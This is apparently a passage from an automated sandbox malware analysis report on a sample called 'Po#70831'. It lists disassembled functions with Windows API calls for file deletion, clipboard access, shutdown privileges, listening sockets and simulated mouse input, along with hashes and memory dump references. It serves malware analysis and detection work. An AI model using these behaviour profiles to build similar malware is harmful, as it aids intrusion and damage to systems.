                                      • Instruction Fuzzy Hash: 0AD153715083009EC710EB95C891EAFBBECBF99704F44492EF585C7191EB38DA48C762
                                      Function 00509642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00509663
                                      • GetFileAttributesW.KERNEL32(?), ref: 005096A1
                                      • SetFileAttributesW.KERNEL32(?,?), ref: 005096BB
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 005096D3
                                      • FindClose.KERNEL32(00000000), ref: 005096DE
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 005096FA
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0050974A
                                      • SetCurrentDirectoryW.KERNEL32(00556B7C), ref: 00509768
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00509772
                                      • FindClose.KERNEL32(00000000), ref: 0050977F
                                      • FindClose.KERNEL32(00000000), ref: 0050978F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                      • String ID: *.*
                                      • API String ID: 1409584000-438819550
                                      • Opcode ID: b126bb0e7b2d0d3ec3df55f8018119850a17732f1f1bee9a86412c2e1bf78fde
                                      • Instruction ID: aef49d68296c915baa79d1e846e818f41e4d2b41166e8d061115c58893bb9bbc
                                      • Opcode Fuzzy Hash: b126bb0e7b2d0d3ec3df55f8018119850a17732f1f1bee9a86412c2e1bf78fde
                                      • Instruction Fuzzy Hash: 7C310332541219AECB24EFB4DC08ADE7FACFF0A320F104196F851E20D2DB30DD448A64
                                      Function 0050979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 005097BE
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00509819
                                      • FindClose.KERNEL32(00000000), ref: 00509824
                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00509840
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00509890
                                      • SetCurrentDirectoryW.KERNEL32(00556B7C), ref: 005098AE
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 005098B8
                                      • FindClose.KERNEL32(00000000), ref: 005098C5
                                      • FindClose.KERNEL32(00000000), ref: 005098D5
                                        • Part of subcall function 004FDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004FDB00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                      • String ID: *.*
                                      • API String ID: 2640511053-438819550
                                      • Opcode ID: e1a84e7db9d269f9c79d474b329546de794113af1615aea73b10e7140485e81e
                                      • Instruction ID: a92a540efb3c534da9b58a2da931bcf4e8f5422ec919130f3db2fb4f3145d0ad
                                      • Opcode Fuzzy Hash: e1a84e7db9d269f9c79d474b329546de794113af1615aea73b10e7140485e81e
                                      • Instruction Fuzzy Hash: DE31E5315016196EDF24EFB4EC48ADE7FACBF16320F148596E850A21D6DB30DD498A64
                                      Function 00508195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 00508257
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00508267
                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00508273
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00508310
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00508324
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00508356
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0050838C
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00508395
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CurrentDirectoryTime$File$Local$System
                                      • String ID: *.*
                                      • API String ID: 1464919966-438819550
                                      • Opcode ID: e7902ea9d87c82ef790d8382a2e19a228bbf5f4ebf684421b53e27b9ff1d40e4
                                      • Instruction ID: 221d22eb09d4f023d7cc6c5ea058e8d16283f2a2f40a2599d45ca1432f02fd27
                                      • Opcode Fuzzy Hash: e7902ea9d87c82ef790d8382a2e19a228bbf5f4ebf684421b53e27b9ff1d40e4
                                      • Instruction Fuzzy Hash: 75615C765043059FCB10EF61C840DAEBBE8FF89318F04492EF99987251DB35E945CB96
                                      Function 004FD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00493AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00493A97,?,?,00492E7F,?,?,?,00000000), ref: 00493AC2
                                        • Part of subcall function 004FE199: GetFileAttributesW.KERNEL32(?,004FCF95), ref: 004FE19A
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004FD122
                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 004FD1DD
                                      • MoveFileW.KERNEL32(?,?), ref: 004FD1F0
                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 004FD20D
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004FD237
                                        • Part of subcall function 004FD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,004FD21C,?,?), ref: 004FD2B2
                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 004FD253
                                      • FindClose.KERNEL32(00000000), ref: 004FD264
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 1946585618-1173974218
                                      • Opcode ID: ba4dc1119e8d700a812e86f8fa99deca4516c0797e6ffb7d04fd89377b3dc56e
                                      • Instruction ID: 90e3c9ee64f11e65724a2185dcdf4fa287e67dbdef99260fae3e1907eee86085
                                      • Opcode Fuzzy Hash: ba4dc1119e8d700a812e86f8fa99deca4516c0797e6ffb7d04fd89377b3dc56e
                                      • Instruction Fuzzy Hash: E7617031C0110D9ACF15EBE1CA529FEBB76AF15308F24416EE50277192EB385F09DBA5
                                      Function 0050ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: 3b797960a0444c1aa69faa8d8dcacf0d9e1b8a708fa82ff5b1646130f8c28614
                                      • Instruction ID: 0017f64dd80056485ffd85cbcebe6eebd4e2f42d51c3007dcce308be550473dd
                                      • Opcode Fuzzy Hash: 3b797960a0444c1aa69faa8d8dcacf0d9e1b8a708fa82ff5b1646130f8c28614
                                      • Instruction Fuzzy Hash: D4418C35204611AFD720DF19D88AB19BFA5FF55328F24889DE41A8B6A2C735FC46CB90
                                      Function 004FE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004F16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004F170D
                                        • Part of subcall function 004F16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004F173A
                                        • Part of subcall function 004F16C3: GetLastError.KERNEL32 ref: 004F174A
                                      • ExitWindowsEx.USER32(?,00000000), ref: 004FE932
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                      • String ID: $ $@$SeShutdownPrivilege
                                      • API String ID: 2234035333-3163812486
                                      • Opcode ID: fb1daadb07fa8e1c51cbc2052f8fb9757bc2c053d29c2ae6966df46ca54cb41b
                                      • Instruction ID: 8214b2a7dabc2362e5e3edba0b89829f9fd812ca43d0248eb7ecd4f80c6f75cd
                                      • Opcode Fuzzy Hash: fb1daadb07fa8e1c51cbc2052f8fb9757bc2c053d29c2ae6966df46ca54cb41b
                                      • Instruction Fuzzy Hash: 3B012BB2610218EFEB2467769C85FBF769C9B14746F140523FE03E21F2D5E85C4591B8
                                      Function 00511204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00511276
                                      • WSAGetLastError.WSOCK32 ref: 00511283
                                      • bind.WSOCK32(00000000,?,00000010), ref: 005112BA
                                      • WSAGetLastError.WSOCK32 ref: 005112C5
                                      • closesocket.WSOCK32(00000000), ref: 005112F4
                                      • listen.WSOCK32(00000000,00000005), ref: 00511303
                                      • WSAGetLastError.WSOCK32 ref: 0051130D
                                      • closesocket.WSOCK32(00000000), ref: 0051133C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                      • String ID:
                                      • API String ID: 540024437-0
                                      • Opcode ID: 1978e724414c8d797c1469dd49d1db6c388585df28e7f2287d12b5aad4990d41
                                      • Instruction ID: c2011439e960d7b413f65dedd6cbeb40dce52146f3810bcd2126100e60e928f5
                                      • Opcode Fuzzy Hash: 1978e724414c8d797c1469dd49d1db6c388585df28e7f2287d12b5aad4990d41
                                      • Instruction Fuzzy Hash: 37419E356005409FE720DF25C488B69BFE6BF46318F188098E9668F297C771EC86CBE1
                                      Function 004CB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 004CB9D4
                                      • _free.LIBCMT ref: 004CB9F8
                                      • _free.LIBCMT ref: 004CBB7F
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00533700), ref: 004CBB91
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0056121C,000000FF,00000000,0000003F,00000000,?,?), ref: 004CBC09
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00561270,000000FF,?,0000003F,00000000,?), ref: 004CBC36
                                      • _free.LIBCMT ref: 004CBD4B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                      • String ID:
                                      • API String ID: 314583886-0
                                      • Opcode ID: fa0a9f61fd7989fe87b135ff6ffce67364b68af8263d57cde58bbf738d2a8ec8
                                      • Instruction ID: 384d93360553588c0819bba08873730a24d8da654f9e5b5b7e772f639c782526
                                      • Opcode Fuzzy Hash: fa0a9f61fd7989fe87b135ff6ffce67364b68af8263d57cde58bbf738d2a8ec8
                                      • Instruction Fuzzy Hash: 7AC1357D900244AECB609F7A8C52FAB7BA8EF41310F18419FE891D7351E7799E019BD8
                                      Function 004FD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00493AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00493A97,?,?,00492E7F,?,?,?,00000000), ref: 00493AC2
                                        • Part of subcall function 004FE199: GetFileAttributesW.KERNEL32(?,004FCF95), ref: 004FE19A
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004FD420
                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 004FD470
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 004FD481
                                      • FindClose.KERNEL32(00000000), ref: 004FD498
                                      • FindClose.KERNEL32(00000000), ref: 004FD4A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 2649000838-1173974218
                                      • Opcode ID: de9822704e515c02280e1648b8450a5558ba4491f62298cf1096fed7e54201b6
                                      • Instruction ID: 6ac606a68f92b49ced5217486d122c89d7aafe8548cfdb7b3c0f8f7da07dc4c0
                                      • Opcode Fuzzy Hash: de9822704e515c02280e1648b8450a5558ba4491f62298cf1096fed7e54201b6
                                      • Instruction Fuzzy Hash: 303190714083459BC710EF65C8518BF7BA8BEA2308F444E2EF5D593191EB38AA09D76B
                                      Function 004CE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: a07ce24fd708da4445472cc1e6a52f9d8c0b30194b8bee4a97d855831a08a68a
                                      • Instruction ID: 159500f812a271818e221b78004eb3a4af4c4f3762d0234c59c9bea19520b93d
                                      • Opcode Fuzzy Hash: a07ce24fd708da4445472cc1e6a52f9d8c0b30194b8bee4a97d855831a08a68a
                                      • Instruction Fuzzy Hash: 40C23A75E046288FDB65CE299D40BEAB7B6EB48304F1441EFD80DE7241E778AE858F44
                                      Function 0050648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 005064DC
                                      • CoInitialize.OLE32(00000000), ref: 00506639
                                      • CoCreateInstance.OLE32(0052FCF8,00000000,00000001,0052FB68,?), ref: 00506650
                                      • CoUninitialize.OLE32 ref: 005068D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 886957087-24824748
                                      • Opcode ID: eb6234d30360cda08bb27761fca1591996836332e7246ff9dfcbcbb3a02c8370
                                      • Instruction ID: 5ff684401c62da839b957e77680be19f1fa2e269cbaa8873c262ea54f1cd5f43
                                      • Opcode Fuzzy Hash: eb6234d30360cda08bb27761fca1591996836332e7246ff9dfcbcbb3a02c8370
                                      • Instruction Fuzzy Hash: 8DD15A71508201AFC714EF25C881D6BBBE8FF95708F40496EF5958B291EB71ED09CBA2
                                      Function 005122DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 005122E8
                                        • Part of subcall function 0050E4EC: GetWindowRect.USER32(?,?), ref: 0050E504
                                      • GetDesktopWindow.USER32 ref: 00512312
                                      • GetWindowRect.USER32(00000000), ref: 00512319
                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00512355
                                      • GetCursorPos.USER32(?), ref: 00512381
                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005123DF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                      • String ID:
                                      • API String ID: 2387181109-0
                                      • Opcode ID: f4b72bb03bfa2530df84dc78af2a7b4929e78ab84f55a3ea69f10936e1e94745
                                      • Instruction ID: c2e770cd58572be583495153d37a288d91607d7dad73869c2fcb9b4a46f426e6
                                      • Opcode Fuzzy Hash: f4b72bb03bfa2530df84dc78af2a7b4929e78ab84f55a3ea69f10936e1e94745
                                      • Instruction Fuzzy Hash: 1431ED72104305ABDB20DF15C849FABBBA9FF88314F00091EF99497291DB34EA59CB92
                                      Function 00509B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00499CB3: _wcslen.LIBCMT ref: 00499CBD
                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00509B78
                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00509C8B
                                        • Part of subcall function 00503874: GetInputState.USER32 ref: 005038CB
                                        • Part of subcall function 00503874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00503966
                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00509BA8
                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00509C75
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
